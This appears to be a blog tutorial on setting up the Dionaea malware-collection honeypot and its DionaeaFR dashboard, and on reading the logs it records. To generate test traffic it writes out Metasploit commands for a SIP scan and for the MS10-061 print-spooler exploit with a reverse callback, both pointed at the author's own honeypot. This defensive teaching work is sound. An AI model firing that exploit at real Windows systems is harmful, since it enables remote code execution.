Dionaea – A Malware collection honeypot

Introduction 

This post outlines the requirements, configuration and step-by-step installation procedure for the Dionaea honeypot. It also briefly covers how Dionaea logs attacks from external entities and how the results are presented in a dashboard interface for easier understanding.

Dionaea


Dionaea is a modern malware collection honeypot that aims to trap malware by exposing vulnerable network services, so that a copy of the malware can be obtained. Dionaea emulates protocols using embedded Python as its scripting language and detects shellcode using libemu. It also supports IPv6 and TLS. Dionaea traps malware arriving over the following protocols:
SMB (Server Message Block)
HTTP (Hyper Text Transfer Protocol)
FTP (File Transfer Protocol)
TFTP (Trivial File Transfer Protocol)
MSSQL (Microsoft SQL Server)
VoIP (Voice over IP)

Requirements 

Ubuntu 12.04 LTS Server 

Configuration 

·      sudo apt-get install libudns-dev libglib2.0-dev libssl-dev libcurl4-openssl-dev libreadline-dev libsqlite3-dev python-dev libtool automake autoconf build-essential subversion git-core flex bison pkg-config libgc-dev libgc1c2 sqlite3 python-geoip sqlite python-pip
·      Create /opt/dionaea/ directory
mkdir /opt/dionaea/
·      Create temp directory  for installation
mkdir ~/src
·       Install Liblcfg Package
cd ~/src
git clone git://git.carnivore.it/liblcfg.git liblcfg
cd liblcfg/code
autoreconf -vi
./configure --prefix=/opt/dionaea
make install
·       Install Libemu package
cd ~/src
git clone git://git.carnivore.it/libemu.git libemu
cd libemu
autoreconf -vi
./configure --prefix=/opt/dionaea
make
make install
ldconfig
·       Install Libnl
On Ubuntu
apt-get install libnl-3-dev libnl-genl-3-dev libnl-nf-3-dev libnl-route-3-dev
otherwise build it from git
cd ~/src
git clone git://git.infradead.org/users/tgr/libnl.git
cd libnl
autoreconf -vi
export LDFLAGS=-Wl,-rpath,/opt/dionaea/lib
./configure --prefix=/opt/dionaea
make
make install
ldconfig
·       Install Libev
tar -xvzf libev-4.04.tar.gz
cd libev-4.04
./configure --prefix=/opt/dionaea
make
make install
·       Install python 3.2
cd ~/src
tar xfz Python-3.2.2.tgz
cd Python-3.2.2
./configure --enable-shared --prefix=/opt/dionaea --with-computed-gotos --enable-ipv6 LDFLAGS="-Wl,-rpath=/opt/dionaea/lib/ -L/usr/lib/x86_64-linux-gnu/"
make
make install
ldconfig 
·       Install Cython 
cd ~/src
tar xfz Cython-0.21rc1.tar.gz
cd Cython-0.21rc1
/opt/dionaea/bin/python3 setup.py install
ldconfig
·       Install Libcurl
sudo apt-get install curl libc6 libcurl3 zlib1g
·       Install Libpcap
tar xfz libpcap-1.6.2.tar.gz
cd libpcap-1.6.2
./configure --prefix=/opt/dionaea
make
make install
ldconfig
·       Install p0f
apt-get install p0f -y
cd /
mkdir nonexistent
chown -R nobody:nogroup nonexistent
·       Clone Dionaea from github
cd ~/src
git clone git://git.carnivore.it/dionaea.git dionaea
·       Compile Dionaea
cd ~/src/dionaea
autoreconf -vi
./configure --with-lcfg-include=/opt/dionaea/include/ \
     --with-lcfg-lib=/opt/dionaea/lib/ \
     --with-python=/opt/dionaea/bin/python3.2 \
     --with-cython-dir=/opt/dionaea/bin \
     --with-udns-include=/opt/dionaea/include/ \
     --with-udns-lib=/opt/dionaea/lib/ \
     --with-emu-include=/opt/dionaea/include/ \
     --with-emu-lib=/opt/dionaea/lib/ \
     --with-gc-include=/usr/include/gc \
     --with-ev-include=/opt/dionaea/include \
     --with-ev-lib=/opt/dionaea/lib \
     --with-nl-include=/opt/dionaea/include \
     --with-nl-lib=/opt/dionaea/lib/ \
     --with-curl-config=/usr/bin/ \
     --with-pcap-include=/opt/dionaea/include \
     --with-pcap-lib=/opt/dionaea/lib/
make
make install
·       Test Dionaea installation
/opt/dionaea/bin/dionaea --help
/opt/dionaea/bin/dionaea -r /opt/dionaea

DionaeaFR – Dashboard 

·      Install pip (Python package manager) and python-netaddr package
apt-get install python-pip python-netaddr
·    Install prerequisites using pip
pip install Django
pip install pygeoip
pip install django-pagination
pip install django-tables2
pip install django-compressor
pip install django-htmlmin
·    Install django-tables2-simplefilter
cd /opt/
unzip django-tables2-simplefilter.zip
mv django-tables2-simplefilter-master/ django-tables2-simplefilter/
cd django-tables2-simplefilter/
python setup.py install
·    Install PySubnetTree
cd /opt/
cd pysubnettree/
python setup.py install
·    Compile and install Node.js from sources
cd /opt/
tar xzvf node-v0.8.16.tar.gz
cd node-v0.8.16
./configure
make
make install
·    Install LESS using npm
npm install -g less
·    Download DionaeaFR
unzip DionaeaFR.zip
mv DionaeaFR-master/ DionaeaFR
·    Get Maxmind’s GeoIP and GeoLite databases
cd /opt/
gunzip GeoLiteCity.dat.gz
gunzip GeoIP.dat.gz
mv GeoIP.dat DionaeaFR/DionaeaFR/static
mv GeoLiteCity.dat DionaeaFR/DionaeaFR/static
·    If the Dionaea installation does not follow the official Dionaea installation guide, line 17 of /opt/DionaeaFR/DionaeaFR/settings.py must be set to the path of Dionaea's SQLite database
·    Change the STATIC_ROOT variable in settings.py to DionaeaFR's folder followed by /static/
·    To start DionaeaFR
cd /opt/DionaeaFR/
sudo python manage.py collectstatic  #type yes when asked
sudo python manage.py runserver 0.0.0.0:8080
·    DionaeaFR's interface is also accessible remotely

Logging 

Run Dionaea to start logging. Here Dionaea is running on IP 192.168.0.109; check which ports it is listening on using netstat
·      /opt/dionaea/bin/dionaea -r /opt/dionaea

·      netstat -ntlp | grep 192.168.0.109




An nmap scan of 192.168.0.109 reports the ports listed above as open, and the services behind them can be exploited through their associated vulnerabilities. For example, SIP can be probed further with a Metasploit auxiliary scanner run with various options. Meanwhile Dionaea picks up the traffic while the Metasploit auxiliary scan is running; the scanning traffic is logged as shown in the figure below.


The auxiliary SIP OPTIONS scan on port 5060
msfcli auxiliary/scanner/sip/options CHOST=192.168.0.169 CPORT=5066 RHOST=192.168.0.109 RPORT=5060 E

Looking into the Dionaea log file at /opt/dionaea/var/log/dionaea.log, we can investigate the connection traffic and look for possible attack indicators. However, querying Dionaea's LogSQL SQLite database with the readlogsqltree Python script gives more readable output. It also shows, for each incident, the exploited vulnerability, the time, the attacker and any shellcode information.
python3.2 /opt/dionaea/bin/readlogsqltree /opt/dionaea/var/dionaea/logsql.sqlite




Now let's exploit the print spooler vulnerability (MS10-061), which could allow remote code execution on Windows systems. Since Dionaea emulates the SMB service to trap malware, the exploit is run against the honeypot.

msfcli exploit/windows/smb/ms10_061_spoolss PNAME=XPSPrinter RHOST=192.168.0.109 EXITFUNC=process LHOST=192.168.0.169 LPORT=4444 E

Dionaea detects and picks up the incidents as shown in the figure below


Let's check the /opt/dionaea/var/dionaea/binaries directory to see whether Dionaea captured any binary executable. Here we go


Meanwhile, querying Dionaea's LogSQL SQLite database gives a better understanding of the traffic generated by the attack
python3.2 /opt/dionaea/bin/readlogsqltree /opt/dionaea/var/dionaea/logsql.sqlite
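Besides reading readlogsqltree's tree-style output, the same LogSQL database can be queried directly to answer the two triage questions raised here and in the SIP scan section above: which remote host hit which emulated service, and which binaries were captured. The block below is an added example, not code from this post or from the Dionaea project. It builds an in-memory SQLite database shaped like a subset of LogSQL's connections and downloads tables (the table and column names, and the protocol labels such as smbd and SipSession, are my assumption modelled on the LogSQL schema; confirm them with `sqlite3 /opt/dionaea/var/dionaea/logsql.sqlite .schema`), loads constructed rows mirroring the SIP OPTIONS scan and the SMB session, and runs the aggregation queries over them.

```python
"""Triage queries over a Dionaea LogSQL-style SQLite database.

Added example; not code from the original post or from the Dionaea project.
The table and column names below are an assumption modelled on the LogSQL
schema: confirm them with `sqlite3 logsql.sqlite .schema` before pointing
summarize() at a real /opt/dionaea/var/dionaea/logsql.sqlite. All rows are constructed.
"""
import sqlite3

# Assumed subset of the LogSQL schema (assumption; verify with .schema).
SCHEMA = """
CREATE TABLE connections (
    connection           INTEGER PRIMARY KEY,
    connection_type      TEXT,     -- 'accept' for inbound, 'connect' for outbound
    connection_transport TEXT,     -- 'tcp' or 'udp'
    connection_protocol  TEXT,     -- emulated service, e.g. smbd, SipSession
    connection_timestamp INTEGER,  -- unix epoch
    local_host           TEXT,
    local_port           INTEGER,
    remote_host          TEXT,
    remote_port          INTEGER
);
CREATE TABLE downloads (
    download          INTEGER PRIMARY KEY,
    connection        INTEGER,
    download_url      TEXT,
    download_md5_hash TEXT
);
"""

# Constructed rows mirroring the post's scenario: a SIP OPTIONS scan against
# udp/5060 and an SMB session that ends with the honeypot fetching a payload.
# Hosts, timestamps, the URL and the hash are all made up for this example.
SAMPLE_CONNECTIONS = [
    (1, "accept",  "udp", "SipSession",  1400000000, "192.168.0.109", 5060, "192.168.0.169", 5066),
    (2, "accept",  "udp", "SipSession",  1400000010, "192.168.0.109", 5060, "192.168.0.169", 5066),
    (3, "accept",  "tcp", "smbd",        1400000100, "192.168.0.109", 445,  "192.168.0.169", 51234),
    (4, "connect", "tcp", "remoteshell", 1400000101, "192.168.0.109", 0,    "192.168.0.169", 4444),
    (5, "accept",  "tcp", "httpd",       1400000200, "192.168.0.109", 80,   "10.0.0.7",      40000),
]
SAMPLE_DOWNLOADS = [
    (1, 4, "http://PLACEHOLDER-URL/payload.exe", "0123456789abcdef0123456789abcdef"),
]


def build_sample_db():
    """Create an in-memory database shaped like LogSQL and load the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO connections VALUES (?,?,?,?,?,?,?,?,?)", SAMPLE_CONNECTIONS)
    conn.executemany("INSERT INTO downloads VALUES (?,?,?,?)", SAMPLE_DOWNLOADS)
    conn.commit()
    return conn


def hits_by_remote_and_service(conn):
    """Inbound connections per (remote_host, emulated service): who hit what."""
    rows = conn.execute(
        "SELECT remote_host, connection_protocol, COUNT(*) FROM connections "
        "WHERE connection_type = 'accept' GROUP BY remote_host, connection_protocol"
    ).fetchall()
    return {(host, proto): n for host, proto, n in rows}


def noisy_remotes(conn, threshold=2):
    """Remote hosts with at least `threshold` inbound connections (scanner candidates)."""
    rows = conn.execute(
        "SELECT remote_host, COUNT(*) FROM connections "
        "WHERE connection_type = 'accept' GROUP BY remote_host HAVING COUNT(*) >= ?",
        (threshold,),
    ).fetchall()
    return sorted(host for host, _n in rows)


def captured_binaries(conn):
    """Each captured download joined to the connection that produced it."""
    rows = conn.execute(
        "SELECT d.download_md5_hash, d.download_url, c.remote_host, c.connection_protocol "
        "FROM downloads d JOIN connections c ON c.connection = d.connection"
    ).fetchall()
    return [{"md5": md5, "url": url, "remote_host": host, "protocol": proto}
            for md5, url, host, proto in rows]


def summarize(db_path=None):
    """Return the three views as a dict; uses the constructed DB when no path is given."""
    conn = build_sample_db() if db_path is None else sqlite3.connect(db_path)
    try:
        return {
            "hits": hits_by_remote_and_service(conn),
            "noisy": noisy_remotes(conn),
            "binaries": captured_binaries(conn),
        }
    finally:
        conn.close()


if __name__ == "__main__":
    for key, value in summarize().items():
        print(key, value)
```

Pass the path of the real database to summarize() to run the same queries against a live honeypot; the outbound "connect" row is deliberately excluded from the hit counts so that the honeypot's own payload fetch is not mistaken for an attacker connection, while the downloads join still ties the captured hash back to the remote host that triggered it.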



Dashboard


DionaeaFR is a frontend dashboard that visualizes the results of the Dionaea honeypot. It shows connections, downloaded malware and the attackers' geolocations, and it can filter the results by state, protocol, service, port and remote port. It runs on the local machine and is also accessible remotely. To run DionaeaFR
•  cd /opt/DionaeaFR
   sudo python manage.py collectstatic #type yes when asked
   sudo python manage.py runserver 0.0.0.0:8080


Using the filters, the SIP session service can be seen in the figure below


The downloaded malware can be seen in the dashboard interface

Conclusion 

The collected malware can be analyzed further to better understand the attacks. The attackers' geolocations can be seen in the dashboard's map view, and the dashboard is also accessible remotely for interactive monitoring.